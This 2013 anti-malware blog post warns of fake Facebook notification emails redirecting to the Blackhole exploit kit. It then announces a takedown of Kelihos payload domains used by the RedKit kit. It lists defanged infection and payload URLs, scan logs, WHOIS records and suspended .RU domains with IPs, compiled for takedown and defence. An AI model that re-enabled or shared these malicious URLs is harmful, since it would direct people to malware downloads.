Thursday, July 25, 2013

#Alert! #Facebook scam emails that will lead you to #Blackhole EK (162.216.18.169, GoDaddy/Linode)

Note: I wrote this post as a quick note to raise this threat's awareness, a warning note for Facebook users; Thus a PoC to be used as verdict for shutdown purpose of the related domain and IP, so I am sorry if you did not find any deep analysis this time.

We received tons of fake Facebook notification email spams with the three themes pattern: (1)Asking you about Facebook password changes, (2)"Your photo was tagged" notification and (3)Friend Request notification. I made snapshot of these threes as per below (please click to enlarge the pics):

These emails will trick you to click the below malware infection URLs with I pasted the recent ones only:

h00p://198.251.67.11/sonya/index.html
h00p://www.kauai2u.com/hiding/index.html
h00p://nendt.com/horded/index.html
h00p://whittakerwatertech.com/hewed/index.html
h00p://www.readingfluency.net/demising/index.html
h00p://adeseye.me.pn/saluted/index.html
h00p://www.bst-kanzlei.de/gist/index.html
h00p://www.discountprescriptions.pacificsocial.com/signally/index.html

What happen after you accessed those URL is, you will load the malicious JavaScript in the below URL:

h00p://traditionlagoonresort.com/prodded/televised.js
And you will be redirected to the Blackhole exploit Kit site here:
h00p://nphscards.com/topic/accidentally-results-stay.php
The browser will look like this upon redirection...

If we trail this threat further we will meet Trojan Zbot/Pony(Credential Stealer), MedFos(downloader) and Zero Access botnet which are served by this Blackhole.
Same infection chain lead to the same URL also verdicted malicious in here-->>[CLICK]

The Blackhole host itself is up and alive in the below domain and NS:

nphscards.com  A  162.216.18.169
nphscards.com  NS  ns30.domaincontrol.com
nphscards.com  NS  ns29.domaincontrol.com
You will see a long record of infection of this IP as per spotted in URLQuery here-->>[CLICK], with the pasted below:
2013-07-25 12:25:54 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 09:30:28 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 08:33:34 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 02:38:35 h00p://nphssoccercards.com [United States] 162.216.18.169
2013-07-25 01:07:51 h00p://nphssoccercards.com/favicon.ico [United States] 162.216.18.169
2013-07-25 01:05:34 h00p://nphssoccercards.com/ubi/template/identity/lib/style-nurse.htc [United States] 162.216.18.169
2013-07-25 01:03:43 h00p://nphssoccercards.com/adobe/update_flash_player.exe [United States] 162.216.18.169
2013-07-25 00:15:33 h00p://nphssoccercards.com/adobe/update_flash_player.exe [United States] 162.216.18.169
2013-07-25 00:12:25 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-25 00:11:30 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 00:04:06 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 23:43:58 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 22:49:27 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 22:14:26 h00p://nphssoccercards.com/adobe/update_flash_player.exe [United States] 162.216.18.169
2013-07-24 22:02:13 h00p://2013vistakonpresidentsclub.com/ [United States] 162.216.18.169
2013-07-24 21:50:46 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 21:47:23 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 20:03:35 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 19:40:30 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 19:33:18 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?If=2d2i2g302g&Se=302g572f53 (...) [United States] 162.216.18.169
2013-07-24 18:56:07 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?iKoOp=572h322i55&wQrxKfxXfP (...) [United States] 162.216.18.169
2013-07-24 18:53:14 h00p://nphssoccercards.com [United States] 162.216.18.169
2013-07-24 18:25:56 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 18:13:21 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 17:53:12 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 17:17:24 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 16:40:13 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 16:29:31 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 13:18:30 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 12:29:44 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
And also can be seen in Virus Total URL check here-->>[CLICK], pasted below as:
5/39 2013-07-25 09:17:49 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?ilhtELOHdpisFWs=YgItFHLgkO&JJfLXzq...
3/39 2013-07-25 07:05:13 h00p://2013vistakonpresidentsclub.com/topic/religiouss-selected.php
8/39 2013-07-25 06:05:45 h00p://nphssoccercards.com/adobe/update_flash_player.exe
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?ceJfcWErQTbG=kCwAByXBRdETOJ&tsDWPg=Rp...
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?Ff=5656562e2i&Ce=2d2i562g552g2f572i54...
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?jf=32542d2e2d&Be=2d2i562g552g2f572i54...
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?TbcoUkQBgX=hGSiu&qhiHoQj=JBEYjg
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?ff=2g3131542j&ke=302g572f5352572i572f...
3/39 2013-07-25 04:01:30 h00p://nphscards.com/topic/accidentally-results-stay.php%27%3B
3/39 2013-07-25 03:49:25 h00p://2013vistakonpresidentsclub.com/topic/operation_statistic_objects.php
5/39 2013-07-25 01:22:26 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?If=2e542f5452&ae=302g572f5352572i5...
5/39 2013-07-25 01:21:06 h00p://nphssoccercards.com/contacts.exe
5/38 2013-07-24 23:07:28 h00p://nphssoccercards.com/ubi/template/identity/lib/style-nurse.htc
8/38 2013-07-24 21:40:20 h00p://nphscards.com/adobe/update_flash_player.exe
7/39 2013-07-24 21:19:11 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php
2/38 2013-07-24 21:03:03 h00p://2013vistakonpresidentsclub.com/
4/39 2013-07-24 18:58:16 h00p://nphscards.com/topic/accidentally-results-stay.php
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?Rf=322e2i542f&fe=302g572f5352572i5...
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?Kf=322e2i542f&xe=522e552d57552f305...
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?If=2d2i2g302g&Se=302g572f53525...
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?KYdttLYSrKSgb=BcaETwRFtxefjW&UAoFL...
4/39 2013-07-24 18:05:46 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?iKoOp=572h322i55&wQrxKfxXfPToik=52...
3/39 2013-07-24 17:20:55 h00p://nphssoccercards.com/adobe/adobe_files/mhtB264%281%29.tmp
2/39 2013-07-24 17:18:51 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php
2/39 2013-07-24 17:16:40 h00p://nphssoccercards.com/
2/39 2013-07-24 17:00:10 h00p://nphssoccercards.com/adobe/
2/39 2013-07-24 16:58:25 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?iKoOp=572h322i55&wQrxKfxXfPToi...
2/39 2013-07-24 16:53:57 h00p://nphscards.com/
4/38 2013-07-24 16:18:14 h00p://nphscards.com/topic/accidentally-results-stay.php?mf=542h2i312h&Me=302g572f5352572i572f...
2/39 2013-07-24 15:18:08 h00p://nphssoccercards.com/forum/viewtopic.php
2/38 2013-07-24 15:07:48 h00p://nphssoccercards.com/topic/religiouss-selected.php
4/38 2013-07-23 23:10:24 h00p://nphscards.com/adobe 
More spotted malware infection: More information of "Royal Baby" scam is here-->>[Malekal]

Domain and IP Network information:

The below is the information of registrar and ISP that provides the IP for this infector:

// Domains & IP registration (for shutddown purpose)
// Is GoDaddy Domain in Linode network

  Domain Name: NPHSCARDS.COM
  Registrar: GODADDY.COM, LLC
  Whois Server: whois.godaddy.com
  Referral URL: http://registrar.godaddy.com
  Name Server: NS29.DOMAINCONTROL.COM
  Name Server: NS30.DOMAINCONTROL.COM
  Status: clientDeleteProhibited
  Status: clientRenewProhibited
  Status: clientTransferProhibited
  Status: clientUpdateProhibited
  Updated Date: 05-oct-2012
  Creation Date: 10-oct-2010
  Expiration Date: 10-oct-2013
  
NetRange:       162.216.16.0 - 162.216.19.255
CIDR:           162.216.16.0/22
OriginAS:
NetName:        LINODE-US
NetHandle:      NET-162-216-16-0-1
Parent:         NET-162-0-0-0-0
NetType:        Direct Allocation
RegDate:        2013-06-19
Updated:        2013-06-19
Ref:            http://whois.arin.net/rest/net/NET-162-216-16-0-1

OrgName:        Linode
OrgId:          LINOD
Address:        329 E. Jimmie Leeds Road
Address:        Suite A
City:           Galloway
StateProv:      NJ
PostalCode:     08205
Country:        US
RegDate:        2008-04-24
Updated:        2010-08-31
Comment:        http://www.linode.com
Ref:            http://whois.arin.net/rest/org/LINODE
Yes, we need GoDaddy cooperation to dismantle this domain to prevent further infection and Linote cooperration to clean up the host.

If you interested in investigation log, you can fetch it here-->>[Download]

Additional

The campaign still goes on, even now:

#MalwareMustDie!

Suspension announcement of 97 .RU domains (registered in REGGI.RU) used by Kelihos Crime Group to spread payload via Red Kit Exploit Pack

MalwareMustDie, NPO, during its research activities, is following the process of suspension malware bad domains as important milestones in malware fighting steps. is also publicly releasing some of suspension domains in the "Operation Tango Down" [What is TangoDown?] as a public announcement.

This time we are shutting down the Kelihos Trojan payload download server's used 97 .RU domains, which was distrubuted by the Red Kit Exploit Kit. All of the detected payload URL we registered them into URLQuery and summarize the URL used for infection by automation after all of the data finished to be registered. We thank you URLQuery for providing a good service that is helpful as evidence of crime for the further legal process. In this case we detected 150 URLs infection, under 97 .RU domains, some of the URLs are served under a subdomains. The usage of the DGA-like randomisation for the domain used for the payload is the MO of this distribution.

The Kelihos Trojan were distributed in (mainly) East European (Ukrainian, Latvia, Belarus, Russia) and Asia servers (Japan, Korea, Taiwan and Hongkong) as the secondary layers, with also using the scattered world wide hacked machines.

Verdict of Crime

The current report is a systematic process of a successful suspension process, as a good coordination between MalwareMustDie members and supporters who help spotted, analysed & reported the threat, our PiCs in Tango Team (thank's to ‏@DL for the hard work during holiday time) and the GroupIB who was performing an excellent coordination on dismantling the related domains to the related Russia registrar (REGGI.RU) suspension process. Overall time took 4d+ for the communication and confirmation process taken.

This wave of Red Kit Exploit Kit campaign using Kelihos as payload was spotted infecting world wide, with the help from our Japan team we have a strong evidence of this infection effort as per published in Operation Clean-up Japan (OCJP) in case #113 here-->>[OCJP-013] , on five domestic sites.

Those infection payload is as per below real sample captured below:

RedKit Redirection PoC Snapshot:
[1] [2] [3] [4] [5]

Based on the payloads above we seek and collected all of the payload servers for this shutdown purpose.

Tango Information

The payload URL is as per below long list, which will be followed by another long list of 97 dismantled domains:

Infection URL data:

// #MalwareMustDie! Kelihos payload URL via RedKit EK Infection
// Reference: http://unixfreaxjp.blogspot.jp/2013/07/ocjp-113redkit-exploit-kitkelihosvia.html
// Detection range: July 1st, 2013 - July 16, 2013
// 

// grep rasta*

0 / 3 [7]hxxp://131.155.81.158/rasta01.exe Netherlands 131.155.81.158
0 / 6 [8]hxxp://fuhxodyz.ru/rasta01.exe Belarus 93.125.67.95
0 / 0 [9]hxxp://www.philchor-nb.de/demo/rasta01.exe Germany
0 / 2 [10]hxxp://ikqydkod.ru/rasta01.exe Ukraine 109.251.141.23
0 / 2 [11]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Russian Federation
0 / 6 [12]hxxp://bopefidi.ru/rasta01.exe Russian Federation 2.94.27.238
0 / 2 [13]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 46.119.193.89
0 / 2 [14]hxxp://sojouvyc.ru/rasta01.exe Ukraine 31.128.74.7
0 / 2 [15]hxxp://vadlubiq.ru/rasta01.exe Ukraine 109.162.84.6
0 / 2 [16]hxxp://kazlyjva.ru/rasta01.exe Malaysia 58.26.182.98
0 / 2 [17]hxxp://funfubap.ru/rasta01.exe Taiwan 114.35.239.185
0 / 2 [18]hxxp://goryzcob.ru/rasta01.exe Ukraine 109.87.254.247
0 / 2 [19]hxxp://motbajsi.ru/rasta01.exe Ukraine 91.196.61.56
0 / 6 [20]hxxp://xymkapaq.ru/rasta01.exe Latvia 89.201.53.86
0 / 2 [21]hxxp://hupjiwuc.ru/rasta01.exe Ukraine 195.114.156.254
0 / 6 [22]hxxp://runevfoh.ru/rasta01.exe Ukraine 5.248.34.57
0 / 2 [23]hxxp://virerceb.ru/rasta01.exe Argentina 190.227.181.203
0 / 6 [24]hxxp://xatzyjha.ru/rasta01.exe Taiwan 1.172.233.239
0 / 2 [25]hxxp://makgivus.ru/rasta01.exe Canada 99.250.218.131
0 / 2 [26]hxxp://avryjpet.ru/rasta01.exe Belarus 91.215.178.83
0 / 2 [27]hxxp://kyjaqcoz.ru/rasta01.exe Ukraine 213.231.52.44
0 / 2 [28]hxxp://bopefidi.ru/rasta01.exe Taiwan 111.255.72.1
0 / 6 [29]hxxp://ycsycxyd.ru/rasta01.exe Japan 118.104.77.165
0 / 2 [30]hxxp://gazgowry.ru/rasta01.exe Ukraine 77.122.55.112
0 / 2 [31]hxxp://vetarwep.ru/rasta01.exe Kazakhstan 176.222.169.243
0 / 6 [32]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Bulgaria 95.43.87.30
0 / 6 [33]hxxp://gulaxxax.ru/rasta01.exe Ukraine 31.42.69.61
0 / 6 [34]hxxp://onhugxic.ru/rasta01.exe Kazakhstan 109.239.45.48
0 / 2 [35]hxxp://ahfamzyk.ru/rasta01.exe Ukraine 178.150.33.194
0 / 6 [36]hxxp://sykevked.ru/rasta01.exe Ukraine 151.0.44.52
0 / 6 [37]hxxp://ydhicdor.ru/rasta01.exe Ukraine 78.30.249.126
0 / 1 [38]hxxp://qeisybyg.ru/rasta01.exe Ukraine 109.87.7.53
0 / 2 [39]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 188.231.173.99
0 / 6 [40]hxxp://kifectah.ru/rasta01.exe Japan 61.27.109.166
0 / 2 [41]hxxp://busasxyv.ru/rasta01.exe Belarus 37.215.87.61
0 / 6 [42]hxxp://yjnaqwew.ru/rasta01.exe Ukraine 93.77.96.252
0 / 6 [43]hxxp://xuktalez.ru/rasta01.exe Ukraine 176.106.211.135
0 / 2 [44]hxxp://ybtoptag.ru/rasta01.exe Latvia 89.191.110.59
0 / 2 [45]hxxp://lygyucce.ru/rasta01.exe Ukraine 94.178.78.102
0 / 6 [46]hxxp://taykenid.ru/rasta01.exe Ukraine 212.92.227.111
0 / 2 [47]hxxp://qeisybyg.ru/rasta01.exe Ukraine 109.251.2.33
0 / 6 [48]hxxp://taykenid.ru/rasta01.exe Ukraine 176.8.183.90
0 / 2 [49]hxxp://qeisybyg.ru/rasta01.exe Ukraine 77.87.156.180
0 / 2 [50]hxxp://bysjyhuf.ru/rasta01.exe Taiwan 1.173.164.63
0 / 6 [51]hxxp://najniner.ru/rasta01.exe Taiwan 114.40.130.52
0 / 4 [52]hxxp://193.105.134.189/rasta01.exe Sweden 193.105.134.189
0 / 6 [53]hxxp://dakacdyn.ru/rasta01.exe Ukraine 178.158.82.158
0 / 6 [54]hxxp://higrikpy.ru/rasta01.exe Belgium 85.26.38.155
0 / 2 [55]hxxp://dipteqna.ru/rasta01.exe Ukraine 109.87.32.180
0 / 6 [56]hxxp://kykywpik.ru/rasta01.exe Ukraine 5.1.13.86
0 / 2 [57]hxxp://cimmitic.ru/rasta01.exe Japan 118.237.85.238
0 / 2 [58]hxxp://ybtoptag.ru/rasta01.exe Belarus 91.215.178.235
0 / 6 [59]hxxp://suyzerew.ru/rasta01.exe Kazakhstan 178.91.37.180
0 / 6 [60]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 93.77.68.69
0 / 2 [61]hxxp://ynhazcel.ru/rasta01.exe Kazakhstan 2.133.226.218
0 / 6 [62]hxxp://aflyzkac.ru/rasta01.exe Ukraine 93.77.28.43
0 / 2 [63]hxxp://giktyxvu.ru/rasta01.exe Ukraine 188.190.42.32
0 / 4 [64]hxxp://193.105.134.89/rasta01.exe Sweden 193.105.134.89
0 / 2 [65]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Ukraine 31.133.38.207
0 / 2 [66]hxxp://aflyzkac.ru/rasta01.exe Japan 210.148.165.67
0 / 6 [67]hxxp://giktyxvu.ru/rasta01.exe Ukraine 178.159.231.99
0 / 6 [68]hxxp://ybtoptag.ru/rasta01.exe Ukraine 89.252.33.161
0 / 6 [69]hxxp://dyvgigim.ru/rasta01.exe Ukraine 37.229.35.234
0 / 4 [70]hxxp://193.105.134.89/rasta01.exe Sweden 193.105.134.89
0 / 6 [71]hxxp://jehrecyp.ru/rasta01.exe Ukraine 188.230.9.64
0 / 2 [72]hxxp://aro0eq.hozfezbe.ru/rasta01.exe[/code] Ukraine
0 / 6 [73]hxxp://cyrkapov.ru/rasta01.exe Ukraine 176.8.183.90
0 / 6 [74]hxxp://niqtasoz.ru/rasta01.exe Ukraine 46.172.147.122
0 / 2 [75]hxxp://ginkyvub.ru/rasta01.exe Ukraine 93.77.84.22
0 / 2 [76]hxxp://tejjetzo.ru/rasta01.exe Moldova, Republic of
0 / 6 [77]hxxp://fafehwiz.ru/rasta01.exe Ukraine 178.150.115.215
0 / 2 [78]hxxp://yhzelbyp.ru/rasta01.exe Ukraine 37.57.24.238
0 / 2 [79]hxxp://ihurvyun.ru/rasta01.exe Ukraine 178.158.198.249
0 / 6 [80]hxxp://adtyuhuz.ru/rasta01.exe Russian Federation 128.73.7.18
0 / 2 [81]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Hong Kong 118.141.33.46
0 / 6 [82]hxxp://jehrecyp.ru/rasta01.exe Ukraine 91.200.138.241
0 / 7 [83]hxxp://tejjetzo.ru/rasta01.exe Ukraine 94.153.63.166
0 / 3 [84]hxxp://fafehwiz.ru/rasta01.exe Ukraine 81.163.152.32
0 / 3 [85]hxxp://yhzelbyp.ru/rasta01.exe Chile 186.36.204.152
0 / 7 [86]hxxp://adtyuhuz.ru/rasta01.exe Argentina 190.107.122.36
0 / 7 [87]hxxp://aggaxsef.ru/rasta01.exe Taiwan 1.173.221.95
0 / 3 [88]hxxp://bomuxvis.ru/rasta01.exe Taiwan 1.172.231.167
0 / 7 [89]hxxp://jehrecyp.ru/rasta01.exe Ukraine 178.150.57.167
0 / 7 [90]hxxp://xejabfom.ru/rasta01.exe Belarus 176.118.159.88
0 / 3 [91]hxxp://sapigrys.ru/rasta01.exe Ukraine 93.77.97.98
0 / 3 [92]hxxp://sodkanxo.ru/rasta01.exe Ukraine 77.122.55.156
0 / 7 [93]hxxp://aggaxsef.ru/rasta01.exe Ukraine 178.150.169.180
0 / 3 [94]hxxp://fafehwiz.ru/rasta01.exe Ukraine 89.162.163.66
0 / 3 [95]hxxp://zyvjofat.ru/rasta01.exe Taiwan 36.239.213.101
0 / 2 [96]hxxp://paxgeqjo.ru/rasta01.exe Israel 46.121.221.173
0 / 6 [97]hxxp://zyvjofat.ru/rasta01.exe Ukraine 46.211.95.246
0 / 2 [98]hxxp://hiznizoc.ru/rasta01.exe Korea, Republic of
0 / 2 [99]hxxp://lysopzoh.ru/rasta01.exe Ukraine 46.118.218.45
0 / 2 [100]hxxp://zyvjofat.ru/rasta01.exe Ukraine 178.150.192.214
0 / 2 [101]hxxp://xoqhozaz.ru/rasta01.exe Ukraine 109.162.96.64
0 / 2 [102]hxxp://hiznizoc.ru/rasta01.exe Ukraine 176.112.20.187
0 / 6 [103]hxxp://lysopzoh.ru/rasta01.exe Ukraine 93.175.234.62
0 / 6 [104]hxxp://zyvjofat.ru/rasta01.exe Ukraine 46.211.227.0
0 / 6 [105]hxxp://pywudcoz.ru/rasta01.exe Japan 180.14.61.59
0 / 6 [106]hxxp://izytexuf.ru/rasta01.exe Taiwan 123.194.247.85
0 / 6 [107]hxxp://izytexuf.ru/rasta01.exe Kazakhstan 2.132.145.189
0 / 6 [108]hxxp://usfezhyk.ru/rasta01.exe Ukraine 176.98.15.73
0 / 6 [109]hxxp://hipahsah.ru/rasta01.exe Belarus 134.17.112.99
0 / 6 [110]hxxp://talozzum.ru/rasta01.exe Ukraine 93.78.126.109
0 / 6 [111]hxxp://yrupxyen.ru/rasta01.exe Ukraine 5.105.21.178
0 / 6 [112]hxxp://nacwoman.ru/rasta01.exe Ukraine 109.251.74.37
0 / 2 [113]hxxp://libcikak.ru/rasta01.exe Japan 219.102.110.98
0 / 6 [114]hxxp://uphinjaq.ru/rasta01.exe Ukraine 151.0.5.20
0 / 6 [115]hxxp://aziwolge.ru/rasta01.exe Ukraine 151.0.38.74
0 / 6 [116]hxxp://kosnutef.ru/rasta01.exe Ukraine 93.79.38.73
0 / 6 [117]hxxp://kiyvryhy.ru/rasta01.exe Ukraine 80.77.44.150
0 / 2 [118]hxxp://oktizsez.ru/rasta01.exe Ukraine 91.227.207.89
0 / 6 [119]hxxp://uphinjaq.ru/rasta01.exe Ukraine 31.170.137.75
0 / 6 [120]hxxp://xaplovav.ru/rasta01.exe Ukraine 93.79.113.101
0 / 6 [121]hxxp://aziwolge.ru/rasta01.exe Ukraine 93.79.2.115
0 / 6 [122]hxxp://uphinjaq.ru/rasta01.exe Taiwan 114.25.156.106
0 / 6 [123]hxxp://xaplovav.ru/rasta01.exe Japan 123.225.106.205
0 / 6 [124]hxxp://oktizsez.ru/rasta01.exe Taiwan 111.252.191.134
0 / 6 [125]hxxp://kiyvryhy.ru/rasta01.exe Taiwan 124.11.195.73
0 / 2 [126]hxxp://sisvizub.ru/rasta01.exe Belarus 178.124.179.118
0 / 2 [127]hxxp://lymimnib.ru/rasta01.exe Ukraine 37.229.38.92
0 / 6 [128]hxxp://fugegwyf.ru/rasta01.exe Ukraine 159.224.94.242
0 / 2 [129]hxxp://fugegwyf.ru/rasta01.exe Russian Federation
0 / 2 [130]hxxp://urxibzep.ru/rasta01.exe Latvia 79.135.142.166
0 / 6 [131]hxxp://cibowjuv.ru/rasta01.exe Japan 219.173.80.25
0 / 6 [132]hxxp://pedtokid.ru/rasta01.exe Ukraine 188.231.173.99
0 / 2 [133]hxxp://bawoxgud.ru/rasta01.exe Ukraine 188.231.173.99

// grep userid*

0 / 3 [7]hxxp://131.155.81.158/userid2.exe Netherlands 131.155.81.158
0 / 6 [8]hxxp://fuhxodyz.ru/userid2.exe Ukraine 89.252.33.161
0 / 2 [9]hxxp://ikqydkod.ru/userid2.exe Ukraine 178.137.38.18
0 / 1 [10]hxxp://ikqydkod.ru/ruserid2.exe Ukraine 176.8.183.137
0 / 6 [11]hxxp://xudsahbu.ru/userid2.exe Colombia 186.99.248.89
0 / 6 [12]hxxp://dypqysro.ru/userid2.exe Ukraine 212.79.121.221
0 / 6 [13]hxxp://uhipyvob.ru/userid2.exe Ukraine 46.119.193.89
0 / 2 [14]hxxp://jyuhysdo.ru/userid2.exe Ukraine 46.119.129.244
0 / 6 [15]hxxp://runevfoh.ru/userid2.exe Ukraine 46.211.249.42
0 / 6 [16]hxxp://hupjiwuc.ru/userid2.exe Ukraine 78.30.193.176
0 / 7 [17]hxxp://busasxyv.ru/userid2.exe Russian Federation 2.94.27.238
0 / 6 [18]hxxp://cypseguv.ru/userid2.exe Taiwan 124.12.91.243
0 / 3 [19]hxxp://78.83.177.242/userid2.exe Bulgaria 78.83.177.242
0 / 7 [20]hxxp://runevfoh.ru/userid2.exe Japan 123.176.141.183
0 / 6 [21]hxxp://confikja.ru/userid2.exe Ukraine 212.2.153.131
0 / 6 [22]hxxp://runevfoh.ru/userid2.exe Belarus 93.191.99.97
0 / 6 [23]hxxp://confikja.ru/userid2.exe Belarus 37.215.114.92
0 / 2 [24]hxxp://confikja.ru/userid2.exe Ukraine 109.87.181.75
0 / 6 [25]hxxp://tofhermi.ru/userid2.exe Ukraine 109.87.83.108
0 / 1 [26]hxxp://fafehwiz.ru/userid1.exe Ukraine 178.151.63.5
0 / 6 [27]hxxp://ybtoptag.ru/userid2.exe Ukraine 94.153.63.166
0 / 2 [28]hxxp://qeisybyg.ru/userid2.exe Russian Federation
0 / 2 [29]hxxp://mihumcuf.ru/userid2.exe Ukraine 77.122.68.176
0 / 1 [30]hxxp://fafehwiz.ru/userid1.exe Ukraine 94.154.33.114
0 / 1 [31]hxxp://ollopdub.ru/userid1.exe Taiwan 114.27.25.145
0 / 1 [32]hxxp://fafehwiz.ru/userid1.exe Ukraine 159.224.8.181
0 / 1 [33]hxxp://ollopdub.ru/userid1.exe Ukraine 92.52.177.41
0 / 1 [34]hxxp://fafehwiz.ru/userid1.exe Ukraine 94.45.106.206
0 / 1 [35]hxxp://ollopdub.ru/userid1.exe Ukraine 109.162.41.226
0 / 1 [36]hxxp://fafehwiz.ru/userid1.exe India 49.206.161.32
0 / 1 [37]hxxp://pywudcoz.ru/userid1.exe Ukraine 93.78.79.28
0 / 1 [38]hxxp://ollopdub.ru/userid1.exe Hong Kong 223.19.195.162
0 / 1 [39]hxxp://ollopdub.ru/userid1.exe Ukraine 46.185.34.216
0 / 1 [40]hxxp://pywudcoz.ru/userid1.exe Russian Federation
0 / 1 [41]hxxp://hiznizoc.ru/userid1.exe Ukraine 87.244.169.104
0 / 1 [42]hxxp://ollopdub.ru/userid1.exe Macedonia 146.255.91.19
0 / 1 [43]hxxp://hiznizoc.ru/userid1.exe Ukraine 176.36.152.60
0 / 1 [44]hxxp://ollopdub.ru/userid1.exe Ukraine 37.143.93.132
0 / 1 [45]hxxp://kosnutef.ru/userid1.exe Ukraine 176.111.35.196
0 / 6 [46]hxxp://acaqizwy.ru/userid1.exe Taiwan 61.227.163.213
0 / 2 [47]hxxp://lymimnib.ru/userid1.exe Ukraine 176.103.208.105
0 / 2 [48]hxxp://sisvizub.ru/userid1.exe Ukraine 178.150.212.143
0 / 3 [49]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 3 [50]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 3 [51]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 2 [52]hxxp://ankoweco.ru/userid1.exe Poland 79.135.180.94
0 / 2 [53]hxxp://uxmadjox.ru/userid1.exe Poland 86.63.98.141

---
#MalwareMustDie! $ date
Tue Jul 16 22:14:11 JST 2013
The domain list and UP IP's as per Fri Jul 19 20:01:00 JST 2013 status during the shutdown process
uhipyvob.ru,178.150.17.118,
ollopdub.ru,176.8.3.144,
fafehwiz.ru,91.217.58.74,
fuhxodyz.ru,77.122.197.86,
ikqydkod.ru,37.229.144.253,
bopefidi.ru,118.34.132.154,
ycsycxyd.ru,95.140.214.250,
sojouvyc.ru,188.129.218.87,
vadlubiq.ru,178.93.135.94,
kazlyjva.ru,109.162.94.114,
funfubap.ru,213.37.166.193,
goryzcob.ru,213.37.166.193,
motbajsi.ru,178.158.158.182,
xymkapaq.ru,93.185.219.213,
runevfoh.ru,89.215.115.4,
virerceb.ru,94.153.36.164,
xatzyjha.ru,93.79.152.211,
makgivus.ru,79.135.211.87,
avryjpet.ru,178.211.105.168,
kyjaqcoz.ru,46.119.144.106,
hiznizoc.ru,46.250.7.179,
giktyxvu.ru,77.123.79.211,
ynhazcel.ru,178.172.246.30,
gazgowry.ru,93.89.208.202,
vetarwep.ru,5.248.164.41,
gulaxxax.ru,46.119.144.106,
onhugxic.ru,109.251.126.26,
ahfamzyk.ru,46.49.47.254,
sykevked.ru,93.77.96.252,
ydhicdor.ru,94.137.172.44,
kifectah.ru,109.122.40.111,
busasxyv.ru,77.121.199.73,
yjnaqwew.ru,77.121.255.183,
xuktalez.ru,91.123.150.115,
lygyucce.ru,94.158.74.230,
taykenid.ru,109.108.252.136,
bysjyhuf.ru,5.1.22.63,
najniner.ru,126.65.174.136,
dakacdyn.ru,109.254.67.25,
higrikpy.ru,78.154.168.74,
dipteqna.ru,188.190.75.232,
kykywpik.ru,109.122.33.79,
cimmitic.ru,153.180.71.144,
suyzerew.ru,217.196.171.35,
yhzelbyp.ru,77.123.80.174,
aflyzkac.ru,93.185.220.213,
tejjetzo.ru,93.89.208.202,
lysopzoh.ru,178.168.22.114,
dyvgigim.ru,46.211.75.123,
jehrecyp.ru,87.69.55.36,
cyrkapov.ru,190.220.70.79,
niqtasoz.ru,178.150.17.118,
ginkyvub.ru,77.123.80.174,
zyvjofat.ru,93.79.152.211,
ihurvyun.ru,94.231.190.74,
izytexuf.ru,31.192.237.101,
adtyuhuz.ru,84.252.56.59,
aggaxsef.ru,94.230.201.36,
bomuxvis.ru,84.240.19.130,
xejabfom.ru,178.158.186.24,
sapigrys.ru,95.69.187.249,
sodkanxo.ru,117.197.245.69,
paxgeqjo.ru,49.205.210.193,
xoqhozaz.ru,95.160.83.57,
usfezhyk.ru,46.119.212.183,
hipahsah.ru,109.87.200.213,
